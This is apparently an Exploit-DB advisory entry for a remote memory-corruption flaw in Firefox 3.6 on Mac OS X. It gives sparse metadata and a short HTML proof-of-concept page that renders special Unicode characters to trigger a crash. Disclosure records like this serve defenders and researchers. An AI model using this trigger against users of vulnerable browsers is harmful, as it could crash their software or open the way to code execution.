Remote Memory-Corruption Vulnerability in Mozilla Firefox

vendor:

Firefox

by:

Not provided

7.5

CVSS

HIGH

Memory-Corruption

Not provided

CWE

Product Name: Firefox

Affected Version From: Firefox 3.6

Affected Version To: Not provided

Patch Exists: Not provided

Related CWE: Not provided

CPE: Not provided

Metasploit:

Other Scripts:

Platforms Tested: Apple Mac OS X

Not provided

Remote Memory-Corruption Vulnerability in Mozilla Firefox

The vulnerability in Mozilla Firefox allows remote attackers to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Not provided

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38943/info

Mozilla Firefox is prone to a remote memory-corruption vulnerability.

Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.

Firefox 3.6 for Apple Mac OS X is vulnerable.

NOTE: This issue was previously covered in BID 38918 (Mozilla Firefox Thunderbird and Seamonkey MFSA 2010-09 through -15 Multiple Vulnerabilities) but has been assigned its own record to better document it. 

<html> <head> <title>Testcase for bug 538065</title> <style type="text/css"> span.test { background: #ff0; } </style> </head> <body> <p>U+FEFF: <span class="test">&#xfeff;</span></p> <p>U+FFF9: <span class="test">&#xfff9;</span></p> <p>U+FFFA: <span class="test">&#xfffa;</span></p> <p>U+FFFB: <span class="test">&#xfffb;</span></p> </body> </html>